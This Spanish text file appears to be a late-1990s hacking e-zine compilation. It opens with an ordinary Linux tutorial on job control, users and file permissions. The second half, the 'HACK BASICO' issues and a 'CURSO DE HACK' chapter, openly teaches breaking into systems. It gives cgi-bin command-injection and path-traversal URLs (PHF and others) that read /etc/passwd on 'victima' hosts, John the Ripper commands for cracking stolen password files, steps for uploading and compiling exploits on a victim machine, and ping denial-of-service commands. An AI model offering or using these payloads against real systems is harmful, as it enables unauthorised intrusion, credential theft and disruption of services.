- tarea de nuevo, con |ctrl-Z|. Esta vez utilice el comando bg para poner la
- tarea en segundo plano. Esto hara que el comando siga ejecutandose igual
- que si lo hubiese hecho desde el principio con "&"
-
- /home/jperez# bg
- [1]+ yes >/dev/null &
- /home/jperez#
-
- Y tenemos de nuevo el prompt. El comando jobs deberia decirnos que
- yes se esta ejecutando, y podemos matar la tarea con kill tal y como lo
- hicimos antes.
-
- Como podemos parar la tarea de nuevo? Si pulsa |ctrl-Z| no
- funcionara, ya que el proceso est en segundo plano. La respuesta es poner
- el proceso en primer plano de nuevo, con el comando fg, y entonces pararlo.
- Como puede observar podr usar fg tanto con tareas detenidas, como con las
- que esten segundo plano.
-
- Hay una gran diferencia entre una tarea que se encuentra en segundo
- plano, y una que se encuentra detenida. Una tarea detenida es una tarea que
- no se esta ejecutando, es decir, que no usa tiempo de CPU, y que no esta
- haciendo ningun trabajo (la tarea aun ocupa un lugar en memoria, aunque
- puede ser volcada a disco). Una tarea en segundo plano, se esta ejecutando,
- y usando memoria, a la vez que completando alguna accion mientras usted
- hace otro trabajo. Sin embargo, una tarea en segundo plano puede intentar
- mostrar texto en su terminal, lo que puede resultar molesto si esta
- haciendo hacer otra cosa. Por ejemplo, si usted uso el comando
-
- /home/jperez# yes &
-
- sin redirigir stdout a /dev/null, una cadena de y-es se mostrar en su
- monitor, sin que pueda interrumpirlo (no puede hacer uso de |ctrl-C| para
- interrumpir tareas en segundo plano). Para poder parar esas interminables
- y-es, tendria que usar el comando fg para pasar la tarea a primer plano, y
- entonces usar |ctrl-C| para matarla. Otra observacion. Normalmente, los
- comandos "fg" y "bg" actuan sobre el ultimo proceso parado (indicado por un
- "+" junto al numero de tarea cuando usa el comando jobs). Si usted tiene
- varios procesos corriendo a la vez, podria mandar a primer o segundo plano
- una tarea especifica indicando el ID de tarea como argumento de fg o bg,
- como en /home/jperez# fg %2 (para la tarea de primer plano numero 2), o
- /home/jperez# bg %3
- (Para la tarea de segundo plano numero 3). No se pueden usar los ID
- de proceso con fg o bg. Ademas de esto, si usa el numero de tarea por si
- solo, como /home/jperez# %2
-
- es equivalente a
-
- /home/jperez# fg %2
-
- Solo queda recordarle que el uso de control de tareas es una utilidad
- de la shell. Los comandos fg, bg y jobs son internos de la shell. Si por
- algun motivo usted utiliza una shell que no soporta control de tareas, no
- espere disponer de estos comandos. Y ademas, hay algunos aspectos del
- control de tareas que difieren entre Bash y Tcsh. De hecho, algunas shells
- no proporcionan ningun control de tareas sin embargo, la mayoria de las
- shells disponibles para Linux soportan control de tareas.
-
- #CAPITULO VI
-
- Administracion de Usuarios
-
- Este es uno de los temas mas importantes para quien ser el
- administrador del sistema. Gran parte de la seguridad del sistema depender
- de la correcta administracion y control de los usuarios, el administrador
- puede tomar dos posturas incorrectas a la hora de proteger el sistema una
- seria el exceso de celo en el cuidado lo que muchas veces va a resultar
- molesto a los usuarios y la otra es ser muy confiado lo que seguro va a
- traer complicaciones con los usuarios experimentados, la postura que yo
- recomiendo el una intermedia. Administrar un sistema es algo asi como
- cuidar la novia o esposa. Independientemente de que tenga muchos usuarios o
- no en su sistema, es importante comprender los aspectos de la gestion de
- usuarios bajo Linux. Incluso si se es el unico usuario, se debe tener,
- presumiblemente, una cuenta distinta de root para hacer la mayor parte del
- trabajo.
-
- Cada persona que utilice el sistema debe tener su propia cuenta. Es
- una malisima idea el que varias personas compartan la misma cuenta. No solo
- es un problema de seguridad, sino que las cuentas se utilizan para
- identificar univocamente a los usuarios del sistema. Se necesita ser capaz
- de saber quien esta haciendo que en cada momento que queramos.
-
- Usuario: podriamos definir como usuario a cada persona que pueda
- logearse al sistema, el que para ello deber ser validado por el
- superusuario. A cada usuario le corresponder lo que se llama "Cuenta" una
- cuenta son lo recursos que se le asignan a ese usuario. A su vez cuando el
- usuario de loguea, se dice que inicia una sesion.
-
- Para la correcta administracion de los usuarios, tendremos que cargar
- toda la informacion que el sistema necesita a fin de identificar como ya
- dijimos univocamente a cada uno. La mayoria de esta informacion la
- encontraremos en el archivo "passwd" que se encuentra en el directorio
- "/etc" a continuacion hago un detalle de esa informacion.
-
- * Nombre de usuario: El nombre de usuario es el identificador unico dado a
- cada usuario del sistema. Ejemplos de nombres de usuario son juan, jerez
- y mariag. Se puede utilizar letras y digitos junto a los caracteres "_"
- (subrayado) y "." (Punto). Los nombres de usuario se limitan normalmente
- a 8 caracteres de longitud.
-
- * User ID: El user ID, o UID, es un numero unico dado a cada usuario del
- sistema. El sistema normalmente mantiene la pista de la informacion por
- UID, no por nombre de usuario.
-
- * Group ID: El group ID, o GID, es la identificacion del grupo del usuario
- por defecto. Cada usuario pertenece a uno o mas grupos definidos por el
- administrador del sistema.
-
- * Clave: El sistema tambien almacena la clave encriptada del usuario. El
- comando passwd se utiliza para poner y cambiar las claves de los usuarios.
-
- * Nombre completo: El "nombre real" o "nombre completo" del usuario se
- almacena junto con el nombre de usuario. Por ejemplo, el usuario jperez
- se llama "Juan Perez" en la vida real.
-
- * Directorio inicial: El directorio inicial es el directorio en el que se
- coloca inicialmente al usuario en tiempo de conexion. Cada usuario debe
- tener su propio directorio inicial, normalmente situado bajo /home.
-
- * Shell de inicio: El shell de inicio del usuario es el interprete de
- comandos que es arrancado para el usuario en tiempo de conexion. Ejemplos
- pueden ser /bin/bash y /bin/tcsh.
-
- Como ya dije el fichero /etc/passwd contiene la informacion anterior
- acerca de los usuarios. Cada linea del fichero contiene informacion acerca
- de un unico usuario; el formato de cada linea es:
-
- nombre:clave encriptada:UID:GID:nombre completo:dir.inicio:shell
-
- Un ejemplo puede ser:
-
- jperez:Xv8Q981g71oKK:102:100:Juan Perez:/home/jperez:/bin/bash
-
- Como puede verse, el primer campo , "jperez", es el nombre de usuario.
-
- El siguiente campo, "Xv8Q981g71oKK", es la clave encriptada. Las
- claves no se almacenan en el sistema en ningun formato legible por el
- hombre. Las claves se encriptan utilizandose a si mismas como clave secreta.
- En otras palabras, solo si se conoce la clave, esta puede ser desencriptada.
- Esta forma de encriptacion es bastante segura.
-
- Algunos sistemas utilizan "claves en sombra" en la que la informacion
- de las claves se relega al fichero /etc/shadow. Puesto que /etc/passwd es
- legible por todo el mundo, /etc/shadow suministra un grado extra de
- seguridad, puesto que este no lo es. Las claves en sombra suministran
- algunas otras funciones como puede ser la expiracion de claves;
-
- El tercer campo "102", es el UID. Este debe ser unico para cada
- usuario.
-
- El cuarto campo, "100", es el GID. Este usuario pertenece al grupo
- numerado 100. La informacion de grupos, como la informacion de usuarios, se
- almacena en el fichero /etc/group. El quinto campo es el nombre completo
- del usuario. "Juan Perez".
-
- Los dos ultimos campos son el directorio inicial del usuario
- (/home/kiwi) y el shell (/bin/bash), respectivamente. No es necesario que el
- directorio inicial de un usuario tenga el mismo nombre que el del nombre de
- usuario. Sin embargo, ayuda a identificar el directorio.
-
- Como agregar un usuario
-
- Cuando se añade un usuario hay varios pasos a seguir. Primero, se le
- debe crear una entrada en /etc/passwd, con un nombre de usuario y UID
- unicos. Se debe especificar el GID, nombre completo y resto de informacion.
- Se debe crear el directorio inicial, y poner los permisos en el directorio
- para que el usuario sea el dueño. Se deben suministrar ficheros de comandos
- de inicializacion en el nuevo directorio y se debe hacer alguna otra
- configuracion del sistema (por ejemplo, preparar un buzon para el correo
- electronico entrante para el nuevo usuario). Aunque todo esto puede ser
- hecho a mano es mucho mas sencillo y seguro usar un programa que se provee
- con Linux llamado "adduser" este programita nos ira preguntando uno a uno
- los datos necesarios y una vez completados se encargara de modificar todos
- los archivos necesarios de configuracion y crear los directorios necesarios.
-
- Como borrar un usuario.
-
- Para borrar un usuario nos basta con borrarlo del archivo "passwd" y
- eliminar tambien todos sus archivos y directorios. Esto se puede hacer a
- mano o usar deluser que es mas seguro. Tambien podemos deshabilitar al
- usuario colocando un asterisco en el lugar donde va la clave encriptada.
-
- Aqui es importante saber que el superusuario puede cambiar en
- cualquier momento la clave de cualquier usuario, mientras que cada usuario
- solo puede cambiar su clave si el root se lo permite. Asi tambien se puede
- habilitar a los usuarios para que cambien por ejemplo su shell y puedan
- elegir el que mas les guste.
-
- #Capitulo VII
-
- Permisos de Ficheros
-
- Conceptos de permisos de ficheros
-
- Al ser UNIX un sistema multiusuario, para proteger los archivos
- importantes del sistema tales como el archivo de claves o ficheros de
- usuarios particulares de la manipulacion por parte de otros, UNIX
- proporciona un mecanismo conocido como permisos de ficheros. Este mecanismo
- permite que ficheros y directorios "pertenezcan" a un usuario en particular.
- Por ejemplo, como jperez creo ficheros en su directorio "home", jperez es
- el propietario de esos ficheros y tiene acceso a ellos.
-
- UNIX tambien permite que los ficheros sean compartidos entre usuarios
- y grupos de usuarios. Si jperez lo desea, podria restringir el acceso a sus
- ficheros de forma que ningun otro usuario tenga acceso excepto el root por
- supuesto. De cualquier modo, en la mayoria de los sistemas por defecto se
- permite que otros usuarios puedan leer tus ficheros pero no modificarlos o
- borrarlos.
-
- Como hemos explicado arriba, cada fichero pertenece a un usuario en
- particular. Por otra parte, los ficheros tambien pertenecen a un grupo en
- particular, que es un conjunto de usuarios definido por el sistema. Cada
- usuario pertenece al menos a un grupo cuando es creado. El administrador
- del sistema puede hacer que un usuario tenga acceso a mas de un grupo.
-
- Los grupos usualmente son definidos por el tipo de usuarios que
- acceden a la maquina. Por ejemplo, en un sistema UNIX de una universidad,
- los usuarios pueden ser divididos en los grupos estudiantes, direccion,
- profesores e invitados. Hay tambien unos pocos grupos definidos por el
- sistema (como bin y admin) los cuales son usados por el propio sistema para
- controlar el acceso a los recursos muy raramente los usuarios normales
- pertenecen a estos grupos.
-
- Los permisos estan divididos en tres tipos: lectura, escritura y
- ejecucion. Estos permisos pueden ser fijados para tres clases de usuarios:
- el propietario del fichero, el grupo al que pertenece el fichero y para
- todos los usuarios independientemente del grupo.
-
- El permiso de lectura permite a un usuario leer el contenido del
- fichero o en el caso de un directorio, listar el contenido del mismo
- (usando ls). El permiso de escritura permite a un usuario escribir y
- modificar el fichero. Para directorios, el permiso de escritura permite
- crear nuevos ficheros o borrar ficheros ya existentes en dicho directorio.
- Por ultimo, el permiso de ejecucion permite a un usuario ejecutar el
- fichero si es un programa o script del shell. Para directorios, el permiso
- de ejecucion permite al usuario cambiar al directorio en cuestion con cd.
-
- Interpretando los permisos de ficheros
-
- Veamos un ejemplo del uso de premisos de ficheros. Usando el
- comando ls con la opción -l se mostrara un listado "largo" de los ficheros,
- el cual incluye los permisos de ficheros.
-
- -rwxr-xr-x 1 jperez users 505 Mar 13 19:05 archivo
-
- Este fichero pertenece a jperez y al grupo users. Echemos un vistazo
- a los permisos. La cadena -rw-r--r-- nos informa, por orden, los tres
- primero corresponden al propietario, los que le siguen al grupo y los
- ultimos a todos. El primer caracter de la cadena de permisos ("-")
- representa el tipo. El "-" significa que es un archivo. Las siguientes tres
- letras ("rwx") representan los permisos para el propietario del fichero,
- jperez. El "r" para "lectura" y "w" para escritura y "x" para ejecucion.
- Los tres caracteres siguientes representan lo permisos del grupo, aqui
- vemos que este archivo tiene permisos de lectura y ejecucion del grupo.
- Y finalmente los ultimos tres caracteres representan los permisos para
- todos los usuarios, tambien de lectura e ejecucion.
-
- Dependencias
-
- Es importante darse cuenta de que los permisos de un fichero tambien
- dependen de los permisos del directorio en el que residen. Por ejemplo,
- aunque un fichero tenga los permisos -rwxrwxrwx, otros usuarios no podran
- acceder a el a menos que tambien tengan permiso de lectura y ejecucion para
- el directorio en el cual se encuentra el fichero. Si jperez quiere
- restringir el acceso a todos sus ficheros, podria simplemente poner los
- permisos de su directorio "home" /home/jperez a -rwx------. De esta forma
- ningun usuario podra acceder a su directorio ni a ninguno de sus ficheros o
- subdirectorios. Jperez no necesita preocuparse de los permisos individuales
- de cada uno de sus ficheros.
-
- En otras palabras, para acceder a un fichero, debes de tener permiso
- de ejecucion de todos los directorios a lo largo del camino de acceso al
- fichero, ademas de permiso de lectura (o ejecucion) del fichero en
- particular.
-
- Habitualmente, los usuarios de un sistema UNIX son muy abiertos con
- sus ficheros. Los permisos que se dan a los ficheros usualmente son
- -rw-r--r--, lo que permite a todos los dem s usuarios leer los ficheros,
- pero no modificarlos de ninguna forma. Los directorios, usualmente tienen
- los permisos -rwxr-xr-x, lo que permite que los demas usuarios puedan
- moverse y ver los directorios, pero sin poder crear o borrar nuevos
- ficheros en ellos.
-
- Muchos usuarios pueden querer limitar el acceso de otros usuarios a
- sus ficheros. Poniendo los permisos de un fichero a -rw------- no se
- permitir a ningun otro usuario acceder al fichero. Igualmente, poniendo los
- permisos del directorio a -rwx------ no se permitir a los demas usuarios
- acceder al directorio en cuestion.
-
- Cambiando permisos
-
- El comando "chmod" se usa para establecer los permisos de un fichero.
- Solo el propietario puede cambiar los permisos del fichero. La sintaxis de
- chmod es: chmod {a,u,g,o}{+,-}{r,w,x} <archivo>
-
- Brevemente, indicamos a que usuarios afecta all, user, group o other.
- Entonces se especifica si se estan añadiendo permisos (+) o quit ndolos
- (-). Finalmente se especifica que tipo de permiso read, write o execute.
- Algunos ejemplos:
-
- chmod a+r archivo
-
- Da a todos los usuarios acceso al fichero.
-
- chmod +r archivo
-
- Como arriba si no se indica "a", "u", "g" u "o" por defecto se toma a.
-
- chmod og-x archivo
-
- Quita permisos de ejecucion a todos los usuarios excepto al
- propietario.
-
- chmod u+rwx archivo
-
- Permite al propietario leer, escribir y ejecutar el fichero.
-
- chmod o-rwx archivo
-
- Quita permisos de lectura, escritura y ejecucion a todos los usuarios
- menos al propietario y a los usuarios del grupo del fichero.
-
- Los usuarios mas experimentados pueden usar directamente la
- nomenclatura octal para asignar o quitar permisos.
-
- Grupos
-
- Como hemos citado anteriormente, cada usuario pertenece a uno o mas
- grupos. La unica importancia real de las relaciones de grupo es la
- perteneciente a los permisos de ficheros, como dijimos en la seccion 3.9,
- cada fichero tiene un "grupo propietario" y un conjunto de permisos de
- grupo que define de que forma pueden acceder al fichero los usuarios del
- grupo.
-
- Hay varios grupos definidos en el sistema, como pueden ser bin, mail,
- y sys. Los usuarios no deben pertenecer a ninguno de estos grupos; se
- utilizan para permisos de ficheros del sistema. En su lugar, los usuarios
- deben pertenecer a un grupo individual, como users. Si se quiere ser
- detallista, se pueden mantener varios grupos de usuarios como por ejemplo
- estudiantes, directivos, profesores, soporte y facultad.
-
- El fichero /etc/group contiene informacion acerca de los grupos. El
- formato de cada linea es
-
- nombre de grupo:clave:GID:otros miembros
-
- Algunos ejemplos de grupos pueden ser:
-
- root:*:0:
- usuarios:*:100:jperez, lmamani
- invitados:*:200:
- otros:*:250:alumno
-
- El primer grupo, root, es un grupo especial del sistema reservado
- para la cuenta root. El siguiente grupo, users, es para usuarios normales.
- Tiene un GID de 100. Los usuarios jperez y lmamani tienen acceso a este
- grupo. Recuerdese que en /etc/passwd cada usuario tiene un GID por defecto.
- Sin embargo, los usuarios pueden pertenecer a mas de un grupo, añadiendo
- sus nombres de usuario a otras lineas de grupo en /etc/group. El comando
- groups lista a que grupos se tiene acceso.
-
- El tercer grupo, invitados, es para usuarios invitados, y otros es
- para "otros" usuarios. El usuario alumno tiene acceso a este grupo.
-
- Como se puede ver, el campo "clave" de /etc/group raramente se
- utiliza. A veces se utiliza para dar una clave para acceder a un grupo.
- Esto es raras veces necesario. Para evitar el que los usuarios cambien a
- grupos privilegiados (con el comando newgroup), se pone el campo de la
- clave a "*".
-
- Se pueden usar los comandos addgroup o groupadd para añadir grupos a
- su sistema. Normalmente es mas sencillo añadir lineas a /etc/group uno
- mismo, puesto que no se necesitan mas configuraciones para añadir un grupo.
- Para borrar un grupo, solo hay que borrar su entrada de /etc/group.
-
- #Glosario
-
- * Bugs: Errores en la confeccion de un programa.
-
- * Driver: programa encargado de servir de intermediario entre el sistema
- operativo y los distintos dispositivos conectados en el ordenador.
-
- * FAQ: Frecuent Asked Question. Cuestion frecuentemente preguntada.
- Recopilacion de preguntas y respuestas sobre las dudas mas
- frecuentes.
-
- * FTP: File Transfer Protocol: Protocolo utilizado para la transmision de
- ficheros.
-
- * GNU: GNU 's not UNIX. Frase recursiva que representa al proyecto
- encargado de la proteccion y creacion de software de libre
- distribucion.
-
- * Hacker: En su doble acepcion, persona que posee un nivel muy importante
- de conocimientos en Unix, experto. Tambien se dice que un hacker
- es aquel que utiliza sus extensos conocimientos de informatica
- para "romper" sistemas de seguridad.
-
- * HOWTO: Como ir hacia. como conseguir. Documentacion especifica obre algun
- aspecto concreto de Linux (impresoras, redes, UPS, etc.
-
- * Kernel: nucleo. En Linux, parte principal del sistema operativo. Codigo
- fuente del propio sistema.
-
- * LDP: Linux Documentacion Project: Proyecto para la Documentacion de Linux.
-
- * LILO: LInux LOader. Cargador de Linux. Pequeño programa que permite el
- arranque de uno o varios sistemas operativos situados en una misma
- maquina. LILO puede poner en marcha, OS/2, Linux, MS-DOS,
- Windows'95, SCO, etc.
-
- * LSM: Linux Software Map. "Mapa" de software para Linux. Base de datos que
- recoge la mayor parte del software disponible para Linux, asi como
- su autor, descripcion, localizacion, observaciones, etc.
-
- * Mainframe: Ordenador principal. Equipo de muy altas prestaciones, Host.
-
- * NFS: Network Filey System: Sistemas de ficheros en red.
-
- * online on-line: en linea, en conexion. Documentacion on-line: documentos
- disponibles a traves de sistemas telematicos.
-
- * script: Guion. Shell script: guion para el procesador de 'ordenes.
- Programa batch. Equivalente en Unix a los ficheros BAT de MS-DOS.
-
- * Shell: Interprete de ordenes o comandos. Programa intermediario entre el
- sistema operativo y el usuario. Imaginatelo como si fuera el
- sustituto del COMMAND.COM de MS-DOS. Linux soporta varias shells
- diferentes (bash, ksh, cshell...).
-
- * Stdin: entrada standard; usualmente el teclado.
-
- * Stdout: salida standard; usualmente la pantalla.
-
- * Swap: Intercambio.
-
- * swap space: Area de intercambio. Memoria virtual. Zona de almacenamiento
- en disco (fichero o particion) que sirve como prolongacion de
- la memoria RAM realmente instalada, permitiendo la ejecucion
- de procesos que, de otra forma, requeririan una ampliacion
- fisica de dicha RAM.
-
- IMPORTANTE: Todo el material aqui incluido es de libre copia y
- distribucion por cualquier medio y soporte siempre que se conserve integro,
- en caso de reproduccion parcial se debe citar la fuente. La confeccion de
- esta guia corresponde a LeTaL, es fruto de la experiencia personal y de la
- recopilacion de documentacion del LDP (Linux Documentation Proyect)
- traducida por mi o por el Proyectos LuCas (Lunix en Castellano).
-
- Agradecimientos: A Linus Torvalds. LuCas, S.L.U.G, J.J.F. / HACKERS TEAM.
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- /***********************************\
- ** **
- ** HACK BASICO by \Wend|g0 **
- ** **
- ** Numero 1 **
- ** **
- \***********************************/
-
- TEMAS:
-
- - Introduccion
- - Lista de puertos
- - Bugs sobre cgi-bin
- - Como empezar a usar el John the Ripper
-
- ______________________________________________________________________________
-
-
- Antes de nada k nadie me confunda con el wendigo perteneciente al SHE,
- ya k yo no soy el. En principio estos textos son para gente que komo yo les
- gusta este ambiente pero no saben mucho y nadie les ayuda en su aprendizaje.
- Que quede muy claro que no quiero dar clases a nadie ya que la mayoria sabe
- mas que yo. Lo que opino es que hay mucha gente empezando que no les vendra
- mal y se haran una vaga idea de como comenzar. Usea, k si ya sabes algo del
- tema pierdes el tiempo leyendo esta serie de txts.
-
- Lo primero que debes hacer para poder entrar en cualquier sistema es
- recopilar toda la informacion posible acerca de el.
-
- -Version de sistema
- -Version de sendmail (Se saca haciendo un telnet al puerto del sendmail
- k es el 25)
- -Version del FTP (Puerto 21)
- -Ver si exporta direcorios al exterior (Desde linux >Showmount -e host)
-
- etc... Asi sabremos k bug ( fallo de sistema ) explotar.
-
- Para empezar voy a explicar los puertos. Existen numerosos puertos
- por los k entrar o interactuar con un host. Para k te kede klaro uno de
- los puertos k mas has utilizado es el 80, k es el puerto HTTP (hiper text
- transfer protocol). El FTP tambien tiene el suyo propio, el 21. Bueno,
- kizas el k mas uses a partir de ahora sea el 23 (TELNET). Aki va una lista
- de los puertos mas comunes para utilizar. No son todos pero si algunos de
- los mas importantes.
-
- **********************************************
-
- discard 9
- netstat 15
- chargen 19
- ftp 21
- telnet 23
- smtp (sendmail) 25
- rlp 39
- bootp 67
- fingerk 79
- http 80 / 8080
- military http 80 / 8080 / 5580
- link 87
- pop3 110
- identd 113
- nntp 119
- newsk 144
- execk 512
- login 513
- pkill 515
- ktalk 517
- ntalk 518
- netwall 533
- rmontior 560
- montior 561
- kerberos 750
-
- **********************************************
-
- Bueno, y despues de esto diras... y ahora que debo hacer? Pues komo
- no es necesario explicarte, supongo k konoceras el tema del /etc/passwd no?,
- pues eso, si lo puedes pillar por ftp anonimo hazlo aunke no creo k sea
- verdadero, es decir, muy gilipoyas tendria k ser el ROOT. Revisa la version
- de sendmail y busca por tu disco duro algun exploit k funcione, ves a URL∩s
- komo www.rootshell.com o raregazz.islatortuga.com/utiles.htm y rebusca
- hasta pillar alguno. Usa cuentas por defecto, haz "surfeo" o cualkier otra
- cosa. Lo k se te pueda okurrir...
-
- Tambien puedes intentar algo muy sencillo k es el PHF. Muchos host no
- tienen este bug pero te asombrarias de la cantidad de administradores
- penosos k ahi. Ademas, intentalo siempre, no vaya a ser k funcione XDDD.
-
- Abre tu navegador habitual y escribe:
-
- http://aki pon el nombre o IP de tu host
- victima/cgi-bin/phf?Query=x%0acat%20/etc/passwd
-
- Con este bug tu puedes usar comandos del UNIX desde tu navegador
- mismo. increible, no?
-
- Pero me diras... Y k komandos puedo usar? Pues de momento aprendete
- los basicos. Al lado esta la ekivalencia kon los del DOS
-
- dir = ls (-a)archivos okultos
- ver = uname -a (version del sistema)
- cat = type
- cd = cd
- cls = clear
-
- Estos komo minimo debes saberlos YA MISMO. Sigamos kon la tecnica
- phf. Si te fijas despues de la letra "a" viene el comando cat. Ahi es
- donde nosotros debemos empezar a poner nuestras ordenes deseadas. Pero...
- Y los espacios? komo los dejamos? Ajaja amigo ... Los espacios los debes
- poner komo %20 lo ves mas claro ahora? Ademas puedes usar modificadores
- pero ten encuenta siempre estos espacios.
-
- Bueno, te voy a poner una serie mas de bugs por cgi-bin bastante
- completita para que vayas jugando un pokillo mas.
-
- http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
- http://www.victima.com/cgi-bin/php.cgi?/etc/passwd
- http://www.victima.com/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
- http://www.victima.com/cgi-bin/phf?Qalias=hell%0auname%20-a%0a
- http://www.victima.com/cgi-bin/handler/whatever;cat /etc/passwd|?data=Download
- http://www.victima.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
- http://www.victima.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
- http://www.victima.com/cgi-bin/view-source?../../../../../../../etc/passwd
- http://www.victima.com/cgi-bin/phf?Jserver=k%0Acat%20/etc/passwd%0a&Qname=d
- http://www.victima.com/cgi-bin/phf?Jserver=k%0Afinger%0a&Qname=d
- http://www.victima.com/cgi-bin/nph-test-cgi?/*
-
- Bueno koleguilla... Debes ahora hacerte con un buen crakeador de
- pass. El que yo te recomiendo es el Ripper. Segun comparativas es el mas
- rapido que existe. Esta repleto de opciones muy interesantes que debes ir
- descubriendo por ti mismo. Yo lo uso de dos maneras simples ya k tampoko
- necesito mas. La primera es usando diccionarios de palabras k te puedes
- bajar de ftp∩s. La segunda es crakearlo a lo bestia usando todas las
- posibles combinaciones de palabras. Esto yo lo hago en casos extremos ya
- k es un proceso inacabable.
-
- Comandos que puedes usar con el Ripper:
-
- Para usar diccionarios escribe:
- john -rules -pwfile:<nombre del fichero> -wordfile:<nombre del diccionario>
- " " modo bestia " john -incremental:all -pwfile:<nombre del fichero>
- (todo tipo de caracteres)
- " " modo bestia " john -incremental:digits -pwfile:<nombre del fichero>
- (solo numeros)
- " " modo bestia " john -incremental:alpha -pwfile:<nombre del fichero>
- (solo letras)
- " " modo bestia " john -incremental:capital -pwfile:<nombre del fichero>
- (con mayusculas)
- john -des -incremental -pwfile:<nombre del fichero>
- john -restore (restaura una sesion despues de haber sido cortada)
-
- Esto es todo por ahora. Si te apetece discutirme o preguntarme algo
- mi email es wendigo13@hotmail.com
-
- /***********************************\
- ** **
- ** HACK BASICO by \Wend|g0 **
- ** **
- ** Numero 2 **
- ** **
- \***********************************/
-
- TEMAS:
-
- - Comandos de win95
- - Compilar exploits
-
- ______________________________________________________________________________
-
- Bueno kolega, ya tienes el ficherito famoso, no?. No me apetece
- explicarte k se divide en tantas partes, k la primera es el login, la
- segunda el passw... SUPONGO K YA LO SABES. Sino pillate docs en los k se
- explica continuamente Y ahora... k hago?. Supongo k habras pillao la
- version de sistema y de sendmail, no? pues entonces !!! Hazlo !!!
- k no sabes?????
-
- Escribe en el sistema esto: ( en un unix, no en ms-dos XDDDD )
-
- # uname -a
-
- Sencillo, no? Esto te dara la version del SO donde estas metido de
- "strangis". Yasta, ahora un exploit k sirva pa este sistema y usalo. Para
- usarlos debes subirlos al ordenata k intentas atakar. Yo uso el Ws_ftp pero
- si no tienes ninguno incluso puedes usar el k viene con win95. Viene uno
- con WIN95 ???? NO JODASSS !!! Pues si. Escribe ftp en alguna ventana
- ms-dos y se te cambiara el prompt a ftp>
- Luego escribes open host_a_hackear y listo. Asegurate k el exploit k
- vas a subir esta en el mismo directorio donde ejecutas el ftp. Aki va una
- lista de las ordenes del ftp para poder usarlo sin problemas ...
-
- ! delete literal prompt send
- ? debug ls put status
- append dir mdelete pwd trace
- ascii disconnect mdir quit type
- bell get mget quote user
- binary glob mkdir recv verbose
- bye hash mls remotehelp
- cd help mput rename
- close lcd open rmdir
-
- No te voy a explicar pa k sirve cada uno ya k hay algunos k ni lo se.
- Ante todo sinceridad XDDDD. Para salir del ftp> escribe Bye y listo y para
- subir un exploit u lo k kieras put nombre_del_fichero.
-
- Ufff... Esto kansa bastante, en serio. Personalmente prefiero leer k
- escribir :). Mas programillas k existen el el directorio WinDowS (sistema
- operativo pseudomultitarea de 16 bits) y k pueden o no ser de utilidad...
-
- TRACERT.EXE Va "trazando" todos los hosts desde el tuyo hasta el
- ekipo al k konectas. Pruebalo, es interesante.
-
- PING.EXE Ni k decir tiene pa k sirve. Usado con fines maleficos puede
- tirar mucha mas pe±a de la k os creeis. Ahi van algunos pings, no se si
- funcionan todos ya k no los he probao. Me los pasaron el otro dia.
-
- ping -l 65510 Atake de DoS "Denial oF Service"
- ping -s 1 -f Tira equipos IBM
- ping -s ip-del-lamer 1024
-
- Todos no funcionan en windows... :)
-
- NBTSTAT.EXE Jejeje, esta es una de las maneras mas faciles de meterte
- en el ordenador de alguien, en serio. Ir probando a ver k konseguis y en el
- proximo numero os explicare como meterte en el ordenata de alguien y
- dejarlo "acojonao". Funciona kuando alguien tiene alguna carpeta compartida
- o mejor aun un disko duro. Ahi es donde entraria la "ingenieria social".
- Escribe nbtstat -A ip_del_lamer y edita el archivo hosts.sam poniendo su IP.
-
- ARP.EXE Otra utilidad pa probar XDDD. Sinceramente tengo una vaga
- idea de para k sirve asin k si alguien kiere explicarmelo gustosamente
- aceptare.
-
- Bueeeeeeno, a lo k ibamos... komo se compila un pu±etero exploit ya
- dentro del UNIX.victima.es? Debes usar el gcc y el cc. A menudo te pone en
- los exploits la orden pa compilarlo correctamente. La orden normal a no
- ser k te digan otra, seria... $ gcc -o exploit exploit.c Asi se te crearia
- un archivo ejecutable listo pa hacerlo funcionar. Si no funciona ves
- probando con cc o c++ en vez de gcc. No obstante en algunos sistemas te
- puedes encontrar con que no "existe" compilador alguno, al menos para el
- usuario sin privilegios.
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- - CURSO DE HACK -
- CHAPTER VI
-
- Bueno pues ya estamos en la 6 entrega de este cursillo de hack, en
- esta entrega he pensado que os explicare el funcionamiento de un crackeador
- de password, lo mas seguro es que ya sepais hacerlo, para lo que si pues
- ahora repasais y para los que no, ya es hora de aprender :)
-
- Crackeadores de passwords ahi mil, pero por suerte son todos muy
- parecidos en el uso, ademas que casi todos los s.o. tienen pero como aqui
- nos enfocamos solo en Unix/Linux los otros los daremos de pasada. No creo
- necesario incluir una explicacion de la estructura del famoso fichero
- /etc/passwd, el cual es el que interesa. Existen muchos documentos por
- Internet que explican el fichero passwd, ademas que en este ezine en otros
- numeros ya a sido tratado, por lo que recomiendo una pasadita en los
- numeros anteriores.
-
- Ahora nos ponemos en accion, supongamos que ya tenemos el fichero
- passwd de un servidor cualquiera, hemos copiado el fichero a nuestro HD y
- ahora usaremos el crackeador que mas nos guste, como ya he dicho existen
- muchos, en este caso usare varios distintos para que veias la diferencia :)
-
- Ejecuto en este caso el John The Ripper, uno de los mas famosos y
- como vereis estoy usando la version 1.5 la cual es la ultima.
-
- D:\hacker\john>john
-
- John the Ripper Version 1.5 Copyright (c) 1996-98 by Solar Designer
-
- Usage: //D/HACKER/JOHN/john [OPTIONS] [PASSWORD-FILES]
- -single "single crack" mode
- -wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
- -rules enable rules for wordlist mode
- -incremental[:MODE] incremental mode [using section MODE]
- -external:MODE external mode or word filter
- -restore[:FILE] restore an interrupted session [from FILE]
- -session:FILE set session file name to FILE
- -makechars:FILE make a charset, FILE will be overwritten
- -show show cracked passwords
- -test perform a benchmark
- -users:[-]LOGIN|UID[,..] load this (these) user(s) only
- -groups:[-]GID[,..] load users of this (these) group(s) only
- -shells:[-]SHELL[,..] load users with this (these) shell(s) only
- -salts:[-]COUNT load salts with at least COUNT passwords only
- -format:NAME force ciphertext format NAME (DES, BSDI, MD5, BF)
- -savemem:LEVEL enable memory saving, at LEVEL 1..3
-
- D:\hacker\john>
-
